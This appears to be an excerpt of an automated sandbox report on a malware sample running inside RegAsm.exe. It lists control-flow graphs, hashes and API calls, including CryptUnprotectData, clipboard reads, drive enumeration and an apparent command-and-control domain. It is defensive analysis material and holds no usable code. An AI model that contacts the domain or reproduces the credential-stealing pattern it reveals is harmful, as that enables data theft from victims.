            control_flow_graph 441 416448-416466 call 409230 call 43a8c0 446 416493-4164af call 409220 call 43a9d0 441->446 447 4166e8-4166ef 441->447 448 41646d-416476 441->448 449 41659c-4165a5 441->449 450 4164cc-4164e7 call 401f30 441->450 451 4164ee-416533 call 402a00 441->451 471 4164b4-4164c5 446->471 454 4166f0-4166f6 447->454 452 416cef-416d1a 448->452 449->447 450->447 450->449 450->451 467 416582-416595 call 402de0 451->467 468 416535 451->468 460 416d57-416d5f 452->460 461 416d1c-416d1f 452->461 454->454 458 4166f8-41670a 454->458 464 416711 458->464 465 41670c-41670f 458->465 469 416d61-416d6f 460->469 470 416da6-416db0 460->470 466 416d20-416d55 461->466 472 416712-416720 464->472 465->464 465->472 466->460 466->466 467->447 467->449 473 416540-416580 468->473 474 416d70-416d77 469->474 471->447 471->449 471->450 471->451 476 416722-416725 472->476 477 416727 472->477 473->467 473->473 478 416d79-416d86 474->478 479 416d8a-416d90 474->479 476->477 482 416728-41674d call 409220 476->482 477->482 478->474 483 416d88 478->483 479->470 481 416d92-416d9e call 437520 479->481 486 416da3 481->486 488 416a81-416ade call 439800 CryptUnprotectData 482->488 489 416753-41675f 482->489 483->470 486->470 494 416c90-416c96 call 409230 488->494 495 416cb0 488->495 496 416cc0-416cd5 call 409230 488->496 497 416cb2-416cb9 488->497 498 416ae5-416af0 488->498 499 416af5-416b33 488->499 500 416c75 488->500 501 416c7b-416c84 call 409230 488->501 502 416cdc-416ce8 488->502 503 416c9f-416caf 488->503 490 416783-4167d0 call 418c50 * 2 489->490 517 416773-41677d 490->517 518 4167d2-4167e4 call 418c50 490->518 494->503 496->494 496->495 496->497 496->498 496->499 496->500 496->501 496->502 496->503 497->496 497->502 498->495 505 416b35 499->505 506 416b7e-416ba2 499->506 501->494 502->452 502->494 502->495 502->496 502->497 502->498 502->499 502->500 502->501 502->502 502->503 503->495 511 416b40-416b7c 505->511 513 416bb0-416bb9 506->513 511->506 511->511 513->513 519 416bbb-416bbe 513->519 517->488 517->490 525 416770 518->525 526 4167e6-416810 518->526 521 416bc0-416bc5 519->521 522 416bc7 519->522 524 416bca-416be3 call 409220 521->524 522->524 532 416c01-416c0f 524->532 533 416be5-416bef 524->533 525->517 528 416812-416828 call 418c50 526->528 529 416845-416848 526->529 528->525 540 41682e-416840 528->540 529->517 534 416c31-416c6e call 409980 call 439800 532->534 535 416c11-416c14 532->535 537 416bf0-416bff 533->537 534->494 534->495 534->496 534->497 534->500 534->501 534->502 534->503 538 416c20-416c2f 535->538 537->532 537->537 538->534 538->538 540->525
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.1767993098.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID: )-1&$-l$h&.&
            • API String ID: 0-153851849
            • Opcode ID: 9a131404707bbd6623fda16981e6e1fedc1f27b98773adb8fc8eb41153bc00c1
            • Instruction ID: f306be605808b356352922595e3cb303dfef2761a962b4518dfd9a5153cadc25
            • Opcode Fuzzy Hash: 9a131404707bbd6623fda16981e6e1fedc1f27b98773adb8fc8eb41153bc00c1
            • Instruction Fuzzy Hash: 06028EB5600B418FD724CF29D891A67B7E2FF9A304F15892ED49A87B92D738F841CB44
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.1767993098.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID: 789:$789:$sdtb
            • API String ID: 0-699493635
            • Opcode ID: 0f53a2138df59d4233c10459ca537407040bed3b95f9fb8b4f3be61caae669d3
            • Instruction ID: faa9cc1a13dda9aad5d19a6c0d4ac18bde3b7ad8c7513efd0213895e636c4a11
            • Opcode Fuzzy Hash: 0f53a2138df59d4233c10459ca537407040bed3b95f9fb8b4f3be61caae669d3
            • Instruction Fuzzy Hash: FB42DCB1608340CFE324CF14E89176BBBE2FB95744F54492EE5898B3A1D738D945CB8A
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.1767993098.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID: !=;e$3>?0$='8
            • API String ID: 0-961702978
            • Opcode ID: 41cb07952805aa8d735d97c0da0fae701ecc07072aacca66224a076cc01e0a2f
            • Instruction ID: b92c2bbe53ffcb88b9997dfa8412634529a92ddc6bd04fbb870b2db9fcb46c7a
            • Opcode Fuzzy Hash: 41cb07952805aa8d735d97c0da0fae701ecc07072aacca66224a076cc01e0a2f
            • Instruction Fuzzy Hash: 29C1BF75204B008FC725CF24D881A63BBF2FF4A314F04896DE89A8B762E739E855CB55
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.1767993098.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID: yKg
            • API String ID: 0-531747830
            • Opcode ID: 96c9d703957de0864733023c5b9a8e3954007aedc508b62c677ab111a5b02af4
            • Instruction ID: e0d38eb94a61a4fde4d72ab33b389e369aff7959b9178c960219dd6971f88e14
            • Opcode Fuzzy Hash: 96c9d703957de0864733023c5b9a8e3954007aedc508b62c677ab111a5b02af4
            • Instruction Fuzzy Hash: B8F1A2702056918FD729CF29C4A0726FBF2BF56304F68859EC4DA8B792C779A805CB94
            APIs
            • LdrInitializeThunk.NTDLL(0043A6DC,005C003F,00000006,?,?,00000018,gxyz,?,[A), ref: 00437546
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.1767993098.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
            Similarity
            • API ID: InitializeThunk
            • String ID: gxyz
            • API String ID: 2994545307-2474275795
            • Opcode ID: 3af67e3b8a4cf002b2d8122619789f5e408d063de0ae60c6913db66b84c766ee
            • Instruction ID: 9a2a3e30e6272c7ba4599b7d5b49d8b1df743313db24dc7d28a19b0c9381744b
            • Opcode Fuzzy Hash: 3af67e3b8a4cf002b2d8122619789f5e408d063de0ae60c6913db66b84c766ee
            • Instruction Fuzzy Hash: 82D04875908216AB9A09CF44C54040EFBE6BFC4714F228C8EA88873214C3B0BD46EB82
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.1767993098.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID: "YZ[
            • API String ID: 0-4110389300
            • Opcode ID: 31b484282694f6e8c43cda5c4d52067a60a85ba653bf103d8845e6e40a323193
            • Instruction ID: d280b8bb8775b920744270ba11066081adf2cf3060c7dfadf52e50f32a473ab1
            • Opcode Fuzzy Hash: 31b484282694f6e8c43cda5c4d52067a60a85ba653bf103d8845e6e40a323193
            • Instruction Fuzzy Hash: 3441AD75908300AFE304CF14D841AABB7E8EB8A715F14492EF89997291D734E945CBAA
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.1767993098.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID: HI
            • API String ID: 0-1987653318
            • Opcode ID: 78898c2ac3ca5542d1acd65899c02281d588040632ae9e14fcc832d8b3f78bd0
            • Instruction ID: 2e9bf0c3544dcb9dba9ac1b4cbfe286574d91a8659f82c4e980938d653e6e103
            • Opcode Fuzzy Hash: 78898c2ac3ca5542d1acd65899c02281d588040632ae9e14fcc832d8b3f78bd0
            • Instruction Fuzzy Hash: FF31B9B11083108BC304CF18C89166BB7F1EFC6768F058A0DE8995B391E778DA86C79B
            Memory Dump Source
            • Source File: 00000002.00000002.1767993098.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 5c5417a8b948ec743c194478a2ff1e7afc2aedeaf3ac3954bc74f08137ada3a3
            • Instruction ID: 95d119ecc987bd34548f78724ecd05f9006e542f7f9d6d9d18c23bd0f6df81d8
            • Opcode Fuzzy Hash: 5c5417a8b948ec743c194478a2ff1e7afc2aedeaf3ac3954bc74f08137ada3a3
            • Instruction Fuzzy Hash: 18B1C0756047008FC725CF24D881A6777F1FF4A318F04496DE89A8B362EB39E855CB55
            Memory Dump Source
            • Source File: 00000002.00000002.1767993098.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: be29a9d17091c925a7693f550fa40bc7e8c61c87d5c4b67eb505104833ec1509
            • Instruction ID: d56b363b32c8beb3380ae49f8b8faefbd28fc9a3c56214eb7b8724f7f71b33d8
            • Opcode Fuzzy Hash: be29a9d17091c925a7693f550fa40bc7e8c61c87d5c4b67eb505104833ec1509
            • Instruction Fuzzy Hash: 44B19FB5500B009FD334DF29C841BA7B7F5FB8A314F004A2EE8AA9B691D734B855CB95
            Memory Dump Source
            • Source File: 00000002.00000002.1767993098.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 12c35ff32a941bbdd420e162e73015a5446485cd7d853dcd78e1964a16e6aef2
            • Instruction ID: 000d420b29e8b2bc770a7e891213e3c80a8676ac310d898d64984dfe42be987d
            • Opcode Fuzzy Hash: 12c35ff32a941bbdd420e162e73015a5446485cd7d853dcd78e1964a16e6aef2
            • Instruction Fuzzy Hash: 48216D70614B418BD728CF16D5A0667B7F2EF8A314B16892EC49B47B61C734F881CB48
            Memory Dump Source
            • Source File: 00000002.00000002.1767993098.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 375752fc342660fb8d7842500cb6bbfa4f583deba857333384c60da2b879e233
            • Instruction ID: bc14edb032e1fb851f8eb3306ff7d1bf8742c1693749d57a1092b902da12a046
            • Opcode Fuzzy Hash: 375752fc342660fb8d7842500cb6bbfa4f583deba857333384c60da2b879e233
            • Instruction Fuzzy Hash: AFF012B16097818FD341CF24D46475ABFF0BF89364F46849ED09ACB292DB74A945CB42

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 166 42ba9a-42bb7d 167 42bbd3-42bc35 SysAllocString 166->167 168 42bb7f 166->168 171 42bc3f-42bc6b 167->171 169 42bb81-42bbcf 168->169 169->169 170 42bbd1 169->170 170->167
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.1767993098.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
            Similarity
            • API ID: AllocString
            • String ID: )$3$;$<$=$B$L
            • API String ID: 2525500382-2118984423
            • Opcode ID: 14bc91b4c46de7d0f804d7d3072f5966408285fe5e4ddedd000de0d1e3b31817
            • Instruction ID: 75c76199725b50b685daf509c0d1850dfe4da42573acd9abfaf945439588bc3e
            • Opcode Fuzzy Hash: 14bc91b4c46de7d0f804d7d3072f5966408285fe5e4ddedd000de0d1e3b31817
            • Instruction Fuzzy Hash: B241C27050C7C18AD331CB28C45879BBFE1ABD6324F448A5DE0E98B2D2CBB49646DB57

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 545 40a9c0-40aaeb call 409920 549 40ab38-40ab81 LoadLibraryExW call 4367b0 545->549 550 40aaed 545->550 560 40ab83-40ab92 549->560 561 40ab97-40ad37 call 439800 * 12 549->561 551 40aaef-40ab34 550->551 551->551 553 40ab36 551->553 553->549 566 40b6b8-40b6c7 560->566 590 40ad3d-40ad4d 561->590 591 40ad5d-40adab call 433750 590->591 592 40ad4f-40ad58 590->592 611 40adad-40adb7 591->611 596 40aebb-40aec5 592->596 596->566 602 40aecb-40b1a3 GetProcessVersion 596->602 606 40b1a5 602->606 607 40b1f8-40b21c call 40c210 602->607 609 40b1a7-40b1f4 606->609 615 40b223-40b34d 607->615 616 40b21e 607->616 609->609 612 40b1f6 609->612 611->611 614 40adb9-40add1 611->614 612->607 617 40add3 614->617 618 40add5-40add8 614->618 620 40b3b5-40b3d7 call 40c930 615->620 621 40b34f-40b351 615->621 619 40b6a9-40b6b6 616->619 624 40ae3a-40ae52 call 40b6d0 617->624 625 40adda-40addd 618->625 619->566 633 40b3dd-40b427 620->633 634 40b66e-40b683 call 4351e0 620->634 622 40b353-40b3af 621->622 622->622 627 40b3b1-40b3b3 622->627 643 40ae57-40ae5c 624->643 630 40ade3-40ae36 call 40f850 625->630 631 40addf-40ade1 625->631 627->620 630->625 635 40ae38 630->635 631->635 640 40b473-40b495 call 40c930 633->640 641 40b429 633->641 646 40b692-40b69b 634->646 647 40b685-40b690 634->647 635->624 640->634 656 40b49b-40b4d1 call 409440 640->656 644 40b42b-40b46f 641->644 648 40ae60-40ae89 call 40c1d0 643->648 649 40ae5e-40ae92 643->649 644->644 650 40b471 644->650 652 40b69d-40b6a5 646->652 647->652 659 40ae94-40ae98 648->659 649->659 650->640 652->566 661 40b6a7 652->661 669 40b4d7-40b4df 656->669 662 40aea3-40aea7 659->662 663 40ae9a-40aea1 659->663 661->619 665 40aeb9 662->665 666 40aea9-40aeb4 662->666 663->662 665->596 666->590 671 40b4e1-40b593 669->671 672 40b4ed-40b513 669->672 678 40b596-40b5a0 671->678 674 40b515 672->674 675 40b517-40b526 672->675 676 40b550-40b552 674->676 680 40b528 675->680 681 40b52a-40b54e 675->681 682 40b554-40b576 676->682 678->678 679 40b5a2-40b5bf 678->679 683 40b5c1-40b5c3 679->683 684 40b62f-40b646 call 40b6d0 679->684 680->676 681->682 682->669 686 40b5c5-40b5cb 683->686 697 40b648 684->697 698 40b64a-40b66a call 40c1d0 684->698 689 40b5d1-40b627 call 40f850 686->689 690 40b5cd-40b5cf 686->690 689->686 693 40b629 689->693 690->693 693->684 699 40b66c 697->699 698->699 699->634
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.1767993098.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
            Similarity
            • API ID: LibraryLoadProcessVersion
            • String ID: bitchsafettyudjwu.shop
            • API String ID: 1829952579-1697548893
            • Opcode ID: 924ec4a804c20c79db334e8f53de515e8df086008f8c0ecd28f39c2135d291e3
            • Instruction ID: 1da61f1cdbcbe1651f9779321b3aafe811b7af53e1d52620931f90ed08967b0b
            • Opcode Fuzzy Hash: 924ec4a804c20c79db334e8f53de515e8df086008f8c0ecd28f39c2135d291e3
            • Instruction Fuzzy Hash: E1925C70508B81CED321CB38C844797BFE1AB16314F144A6ED0EA9B7D2D779A449CB6B

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 777 43317d-43320a call 439800 * 2 GetVolumeInformationW
            APIs
            • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 004331F5
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.1767993098.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
            Similarity
            • API ID: InformationVolume
            • String ID: 1-H$\
            • API String ID: 2039140958-3850842569
            • Opcode ID: 3a8dea79b50a5e21bb71dc4082ff2fb25f48b6962291f46884597ba42e2198e9
            • Instruction ID: 5d9a0e9c960a7d33cae1679c9d7b762b03f65cc893c2dcae2fb953d0a8b5b719
            • Opcode Fuzzy Hash: 3a8dea79b50a5e21bb71dc4082ff2fb25f48b6962291f46884597ba42e2198e9
            • Instruction Fuzzy Hash: B6F06D78294300BEF224AF51DD03F1A72A5ABC5F09F30992CB2443A2D1D6F47905CA5D
            APIs
            • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 00428497
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.1767993098.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
            Similarity
            • API ID: InstalledMemoryPhysicallySystem
            • String ID: yKg
            • API String ID: 3960555810-531747830
            • Opcode ID: 8bf82030cec6a9ad0efd7bc05bda0530c0a12c054bcf5cf18ca1a9aca7f373fe
            • Instruction ID: afd000dd50fbca840850aa0c3c88bc22a244ac5a8cf2b48d6427651755728cd0
            • Opcode Fuzzy Hash: 8bf82030cec6a9ad0efd7bc05bda0530c0a12c054bcf5cf18ca1a9aca7f373fe
            • Instruction Fuzzy Hash: 85E1D2702052518FD729CF29D490726FBF2BF56304F28859EC4DA8F782D739A805CB99
            APIs
            • LoadLibraryExW.KERNELBASE(?,00000000,00000800), ref: 00437298
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.1767993098.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
            Similarity
            • API ID: LibraryLoad
            • String ID: p%J'
            • API String ID: 1029625771-3680627055
            • Opcode ID: b03a9d388fc1c7845ae3f5e6dc9ba26b4857e129472a3e3170184674395e9c8c
            • Instruction ID: 36f330ba3dad1352f45bb05c99e2d24d4fc91ff7c869d8a236f8cc2f9754142e
            • Opcode Fuzzy Hash: b03a9d388fc1c7845ae3f5e6dc9ba26b4857e129472a3e3170184674395e9c8c
            • Instruction Fuzzy Hash: EA41D2B56542868FD729CF28C8D0B56BBF1FF5A300B28999DD8C1CB756C638A406CB94
            APIs
            Strings
            • system or character via spellings glyphs a is uses that in their modified other on often reflection or resemblance on it leetspeak, used similarity internet. play eleet the of the replacements of primarily ways, xrefs: 004098C2
            Memory Dump Source
            • Source File: 00000002.00000002.1767993098.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
            Similarity
            • API ID: ExitProcess
            • String ID: system or character via spellings glyphs a is uses that in their modified other on often reflection or resemblance on it leetspeak, used similarity internet. play eleet the of the replacements of primarily ways
            • API String ID: 621844428-780655312
            • Opcode ID: a9734080bae07a464f98f8ba5c8e770db3b188e7888a8e107250778e63c86fd4
            • Instruction ID: ec518c94b98ee3263fccb122146f130969d3e20a4343a08fdd3a0d5e89f87d40
            • Opcode Fuzzy Hash: a9734080bae07a464f98f8ba5c8e770db3b188e7888a8e107250778e63c86fd4
            • Instruction Fuzzy Hash: F4F05EF282861096C61037775A0326E7A545F22358F01903FED80713C3EB7D8809A6DF
            APIs
            • RtlReAllocateHeap.NTDLL(?,00000000), ref: 004374F1
            Memory Dump Source
            • Source File: 00000002.00000002.1767993098.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
            Similarity
            • API ID: AllocateHeap
            • String ID:
            • API String ID: 1279760036-0
            • Opcode ID: 26d1188ee968bf41f6b61f89a8a125ecd95126f0502c7fff6d94cb35ffa4d202
            • Instruction ID: 25f0e6dc3fcc1ba59fedb68b2305f42c7ac30a6e42c2915ced9597638a948f82
            • Opcode Fuzzy Hash: 26d1188ee968bf41f6b61f89a8a125ecd95126f0502c7fff6d94cb35ffa4d202
            • Instruction Fuzzy Hash: 23016936A083109BC311DF09C88074BBBA3EFC8725F14CA1DE9D417664C379AC568BC2
            APIs
            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040FE95
            Memory Dump Source
            • Source File: 00000002.00000002.1767993098.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
            Similarity
            • API ID: DirectorySystem
            • String ID:
            • API String ID: 2188284642-0
            • Opcode ID: 440ef4bc68db77490fe4eb25ab21aa53b15c9447e4dd7124a3021fba07638529
            • Instruction ID: 56cb7ace2f75cce823e8f57870bd41fa571cccf6c5220877850cb2abb5f36c17
            • Opcode Fuzzy Hash: 440ef4bc68db77490fe4eb25ab21aa53b15c9447e4dd7124a3021fba07638529
            • Instruction Fuzzy Hash: 930128F6E0016007D37883249C9227A32569FC5328F19413FD855D77E2DB3D4C558685
            APIs
            • RtlAllocateHeap.NTDLL(?,00000000), ref: 004351D4
            Memory Dump Source
            • Source File: 00000002.00000002.1767993098.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
            Similarity
            • API ID: AllocateHeap
            • String ID:
            • API String ID: 1279760036-0
            • Opcode ID: 6e3e84d1437e83f48da7ecb2a4c5a896dbc3042814263a5cf5a32fc3d2f1a14d
            • Instruction ID: 9e001fa10bd327055e935a1bb85f38787157271f68dd4fc1156b793af3c6225e
            • Opcode Fuzzy Hash: 6e3e84d1437e83f48da7ecb2a4c5a896dbc3042814263a5cf5a32fc3d2f1a14d
            • Instruction Fuzzy Hash: 5CF04F316082419BDB19EB14D9A0A2EF7B2EFD5704F148A5DE6C5132A1C7355C22CB8A
            APIs
            • GetLogicalDrives.KERNELBASE ref: 00436BAF
            Memory Dump Source
            • Source File: 00000002.00000002.1767993098.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
            Similarity
            • API ID: DrivesLogical
            • String ID:
            • API String ID: 999431828-0
            • Opcode ID: 2ef04481a336257e9ef6bd56323a48691569bf46f92e05498320c1c443db00f0
            • Instruction ID: 757ffdf0fb752df967ca153b69be1638c16994d948b637b117849b5fc8d8cf46
            • Opcode Fuzzy Hash: 2ef04481a336257e9ef6bd56323a48691569bf46f92e05498320c1c443db00f0
            • Instruction Fuzzy Hash: 08E0C2756407009FC350DF05EC42A2777F1EB89704700083DE402C3396C734A804CB18
            APIs
            • RtlFreeHeap.NTDLL(?,00000000,?), ref: 004352B8
            Memory Dump Source
            • Source File: 00000002.00000002.1767993098.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
            Similarity
            • API ID: FreeHeap
            • String ID:
            • API String ID: 3298025750-0
            • Opcode ID: f1606b2ba95e15313dbab914cadcf7528d2f9d4c27597b0747b3033836c29d3b
            • Instruction ID: c3e0e88b322fb45c369fc8747f393fe10f381de69fb9e740cdaa004beb4260c0
            • Opcode Fuzzy Hash: f1606b2ba95e15313dbab914cadcf7528d2f9d4c27597b0747b3033836c29d3b
            • Instruction Fuzzy Hash: 3EB0923BA40108A9DF212A98BC01BCCB724EB84265F108163E71855040823292244690
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.1767993098.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
            Similarity
            • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
            • String ID: F$G$L$P$R$U$[$^
            • API String ID: 2832541153-1331671791
            • Opcode ID: af43edbf7669b4f459e9b96f902f02a9e3870ca5603eb9944210f72b68121a02
            • Instruction ID: c9527c498a4d632a20df3cd58748e7b8776409ea439d0e3166b93a01e0573a5d
            • Opcode Fuzzy Hash: af43edbf7669b4f459e9b96f902f02a9e3870ca5603eb9944210f72b68121a02
            • Instruction Fuzzy Hash: D351287190C390CBD300EB29D44835FBFE0AB9A318F440A5EE8D957292D7799909DB9B
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.1767993098.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID: <=$TU$^a$_L$_Z$t-[#
            • API String ID: 0-1362180010
            • Opcode ID: 90c59bc6343016d2b030d3b7261e5d0369e39779251c57453a25c7fbe7e367c2
            • Instruction ID: dbc8a93944392250a53c063f075270cb10284053a0b6e2f61ab9c54cf473faf4
            • Opcode Fuzzy Hash: 90c59bc6343016d2b030d3b7261e5d0369e39779251c57453a25c7fbe7e367c2
            • Instruction Fuzzy Hash: 6EC155B0508341ABD754CF14C89069FBBF2EFC63A8F54991DE4C99B261DB38D885CB4A
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.1767993098.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID: 26C$27C$789:$B6C$B7C$r6C
            • API String ID: 0-3075561139
            • Opcode ID: 9775384729ed828753f77e29eb136aeacf9d7d30d22adb09796049daabd8e28c
            • Instruction ID: 9c983fa4abdd4bde5f2217727c2d2cc958e68b9fe08107502c54f52696ebd130
            • Opcode Fuzzy Hash: 9775384729ed828753f77e29eb136aeacf9d7d30d22adb09796049daabd8e28c
            • Instruction Fuzzy Hash: 28818A78604640DFD724CF29D890B26B7E2FB8E305F14892DE18A8BB92D735A915CB58
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.1767993098.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID: 3B$"$f/B$r1B
            • API String ID: 0-3692120770
            • Opcode ID: 8168132165a64e3d58e27e02496fb20dd3a8610cc433c5894b3ca2adfc7f9f56
            • Instruction ID: 23f1c6be7f045290fee8f0e6d37f877a36aa206be125206ae7b2dd0da60d4533
            • Opcode Fuzzy Hash: 8168132165a64e3d58e27e02496fb20dd3a8610cc433c5894b3ca2adfc7f9f56
            • Instruction Fuzzy Hash: 37D126317182509FC718CF2CE89032AB7E2AF8A725F59466EF4A5C73D1C7789E408759
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.1767993098.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID: 198:$i[S'
            • API String ID: 0-1572211831
            • Opcode ID: e3208e49c3782cef7cba26df6f9d11536247aac12a0d716be709595865c047b0
            • Instruction ID: 5b057de0aa084a16de97f544fc6c683b9101436b8165939f1e3a77d3828dc7c9
            • Opcode Fuzzy Hash: e3208e49c3782cef7cba26df6f9d11536247aac12a0d716be709595865c047b0
            • Instruction Fuzzy Hash: 86D1A2B5604B11CFC324CF19C890A66B7F2FF8A314B198A6DD4968BBA1D774F846CB44
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.1767993098.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID: >=$D
            • API String ID: 0-2639938146
            • Opcode ID: be9b79ec75915bce8e82fc3add8755b1c6e66e0743bb7683ec99d6c7b1839b26
            • Instruction ID: c15b10d853bfd4cb65f9f21a8f133a050bdaf40d6f2a856c402b5e8ee1c4afbe
            • Opcode Fuzzy Hash: be9b79ec75915bce8e82fc3add8755b1c6e66e0743bb7683ec99d6c7b1839b26
            • Instruction Fuzzy Hash: 6B81F0B02093818BD3348F15C8A57DBBBE1EFC6715F04491DE4CA8B390D7B99989CB86
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.1767993098.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID: |MJK
            • API String ID: 0-2474107196
            • Opcode ID: 57b3671accc7f5b69f25d98514e57db2be032d40b24230f25d237f1975987f1c
            • Instruction ID: c78ef94e20db58684c1d5cc47ae36e2a547e4f8977e06cd5561e301cb6821edd
            • Opcode Fuzzy Hash: 57b3671accc7f5b69f25d98514e57db2be032d40b24230f25d237f1975987f1c
            • Instruction Fuzzy Hash: 5092BF75608601CFC324CF28D4A0656B7F2FF8E314F2989ADD49A8B765D735E802CB85
